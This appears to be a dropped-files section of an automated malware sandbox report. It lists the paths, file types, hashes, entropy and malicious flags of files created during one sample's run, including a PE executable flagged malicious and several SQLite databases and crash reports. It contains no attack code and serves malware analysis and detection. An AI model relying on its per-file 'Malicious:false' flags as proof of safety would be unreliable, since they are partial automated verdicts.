                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                                                                                                                                                                                MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                                                                                                                                                                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                                                                                                                                                                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                                                                                                                                                                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1998848
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9427880780763775
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:v1r2g+mLqqeaVjSeluJsslFHfjeKgHEaVjsKHzG:drz+OqjXeluJxlFHf6zHj
                                                                                                                                                                                                                                                                                                                                                                MD5:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                SHA1:50992F712B281DB70518E6D404084E26DCD98B98
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                                                                                                                                                                                                                                                                                                                                                                SHA-512:18A2FA6E9C97281328DE819126DCCB6CC8576E11EA11A8FABA629DA58E724040427C7D941CE0F935948195C30DA6D60A6873D7E3E9613EBA7DF42BDE1A3ABA1F
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                                • Filename: zbnq9rGNLi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: e5eFd2bt37.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.690071120548773
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                                                                                                                                                                                                                                                                                                MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                                                                                                                                                                                                                                                                                                SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.701188456968639
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                                                                                                                                                                                                                                                                                                                MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                                                                                                                                                                                                                                                                                                                SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.695566741548326
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:61iSJC9lUfmxZoTgwj7WkGrivJpQ4t468phJvvHIm:6M/lU+x27HleIQ4t4bHIm
                                                                                                                                                                                                                                                                                                                                                                MD5:CA699715DA51DFD5AB81CDA02AFD2CD7
                                                                                                                                                                                                                                                                                                                                                                SHA1:72D44C17A04FAB316BEA20F61A80D7AC787879D4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BA61F500E1845F2FC03C990DA95B7DD92ED8B7583744C941D37BDD90DA666D21
                                                                                                                                                                                                                                                                                                                                                                SHA-512:497F9D6B6EE52454F4B740A6B765F46EBC10575E9A20B62D76594E1CC4E37868182D18315E05E62A78D5131A5569C95C8989F248E3A8C72BD95A99883DF196D2
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.698669844484375
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
                                                                                                                                                                                                                                                                                                                                                                MD5:4FCF725C73B93BE52C2E1CD48AC3A562
                                                                                                                                                                                                                                                                                                                                                                SHA1:98118BDED7CC2397C19310A914C6CA6B39CC47DE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8948664499001592
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:0ozuFzsmcpEscB+trmUfbQXIDcQzc6rcEqcw3Mn+HbHgEotuuzOyu8KazWkbO+k8:mWmcpE0u0Nvw4sjTfAzuiFOZ24IO8+
                                                                                                                                                                                                                                                                                                                                                                MD5:AC03673864E3D8F1166E362B0E2ECC4D
                                                                                                                                                                                                                                                                                                                                                                SHA1:3037CA0F1E6400AE6E3667A7290C7AAD48EAC581
                                                                                                                                                                                                                                                                                                                                                                SHA-256:335AA1D3C1EE215531BD362CB25930BD89D7EAFF8362F4D201C3CFC009997D50
                                                                                                                                                                                                                                                                                                                                                                SHA-512:92916302BF78207BB933CA2B2D2B695D5AB745583116AB5EC3538E53532852FF1C4E6210E915E98AE570A3DDBBAF419BA2AEC83F0D5EAF24D27607EFB762FA62
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.1.6.0.5.1.5.2.7.5.8.1.8.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.1.6.0.5.1.5.5.3.9.8.8.0.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.2.6.8.0.1.5.-.9.f.0.a.-.4.1.2.a.-.b.f.d.b.-.2.a.c.2.b.3.8.3.3.3.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.a.5.5.5.9.5.-.7.f.0.e.-.4.3.9.5.-.b.f.4.1.-.3.d.7.a.c.2.a.1.4.7.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.E.8.B...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.h.i.l.k.a.t.U.t.i.l...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.5.-.0.9.2.4.-.e.0.2.f.2.4.5.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.0.a.b.5.5.e.a.e.e.7.8.7.8.a.c.7.a.6.d.b.8.c.3.7.8.1.9.8.9.2.0.0.0.0.0.9.0.4.!.0.0.0.0.0.f.5.1.8.3.b.2.a.4.0.1.6.9.7.5.5.e.a.d.e.4.f.f.4.5.3.5.4.e.8.f.c.c.3.c.f.7.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Feb 5 11:12:33 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):99308
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1137733404339083
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:YdVIoqnvBv+Ju4y/yWtKl0A+2VGb0FkXz+JCsC7fQPMV3pEEOpo/Y4Ioy8fg97aN:YdWtnvBmw7KSY0P4GbykD+lPMVFF
                                                                                                                                                                                                                                                                                                                                                                MD5:FBDF22433FB71BE239F178DD2551D425
                                                                                                                                                                                                                                                                                                                                                                SHA1:8D77D876D430A474E3F4AC48344B25A9ABF5974F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:431CD40C26A052D5D16D5744B80B2A5DDEB5A4B4658F6C72D1DE4C570E495CB2
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5395D1F3DCB00606012C63B77C4D43E73DF19BB65C7C35DA6E4507D0F8BD2DA98319DEFC28535E9BB2AC607EB9BA67DEE8EE78AEE6D35AA62273A90B846C25DB
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):8312
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6945987798838513
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJen6Td6Y2DlSUNBgmfL5HQvprx89b1Lsf+nm:R6lXJ26p6YoSUNBgmfLpb1Qff
                                                                                                                                                                                                                                                                                                                                                                MD5:E48DD894049B99E935BCB647D178ED03
                                                                                                                                                                                                                                                                                                                                                                SHA1:DBD8986429355FF1E6257ABA4ED048AF83B54126
                                                                                                                                                                                                                                                                                                                                                                SHA-256:6A05C2A1570F0C5BD724A3C9C1FF7EFA04DEE370B289C57174C6593ADCA58281
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4C36C32B56CC81E32B0DB3C80DA503971C192DF917E4CB3288CDBB884230698980B8EBBDD01B81AA0D394CC978A1A0E1DE6A879855BFC346760987E2320825A2
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4626
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451051076961632
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsQJg77aI9IimWpW8VYgzYm8M4J0lBmEF1+q8iVBQqfieHzmd:uIjfWI7Win7VEJ0lfVV5fPHzmd
                                                                                                                                                                                                                                                                                                                                                                MD5:B5379AA2E7BB0DD0A27EE4123419C35B
                                                                                                                                                                                                                                                                                                                                                                SHA1:7BB6AC2460F0105118C5B8ADE6D5CF5A2D1E415D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F04A28BD4B9E11AAD7AA7884468C95C85441DD5740D2D81E22AC49CC42AF58EC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:777AD6023E57C3CA4CB6838B2528591E94AE064428609D3C0A6C91D5B9C4AAF7487C766A9A7C188F1BC6B27E49F73694B96B5B9931ADD0F6B13D7D160FCD2D8A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="180135" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):89004
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0963694369421333
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:Tojz5WFC/8lCZXmQQa+JOtGQVxDFhCcIn/kOW1vlpxTwzm82:Tojz5WFC/8lCZXmQQlJOtGQVxDFhCcIc
                                                                                                                                                                                                                                                                                                                                                                MD5:EA9E3ED6CE792791D9A7A29A0A0F841B
                                                                                                                                                                                                                                                                                                                                                                SHA1:ADDA438799749C925DACE2E46E619E64B5F8E1E0
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D7E7B4483CAE57C9AD80C6EACC5A352021F0946CEA98DBDEA2CA29F24F66B68D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:44C3D5854FAF27FE371E990EC6C2C104CC607714F269F5AAE1772B3A0839BAC524BE4FA1C0DB99AFBED637FDD8E6EFF192C08BE9C7D83418E20DFD1CFC7E0340
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.685002178413773
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWbzQpIaMTtYEYf7WPHcUYEZeZtFi/BM+Jr0wOkKU4caGiS6MacJIBd3:2ZDbzpzGiQiaGiS6Mac2Bd3
                                                                                                                                                                                                                                                                                                                                                                MD5:DE1C0F667BF632ED6BF2A1DE12E0A9CA
                                                                                                                                                                                                                                                                                                                                                                SHA1:D75D404A5E5193DAD9647C80A792B70531DDBA55
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C320A38BAB906CAEE295BBBE44915C033196AEA0349B0F6B2B8191A8D15BA6CB
                                                                                                                                                                                                                                                                                                                                                                SHA-512:6554F12F291399A9484E4C18406B424D1926324070F98700863EE4A3A7205B5BAC70E80BCACE21844E61084D2CB2895EA25BFE1038C911E16BA945E240BD1A97
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
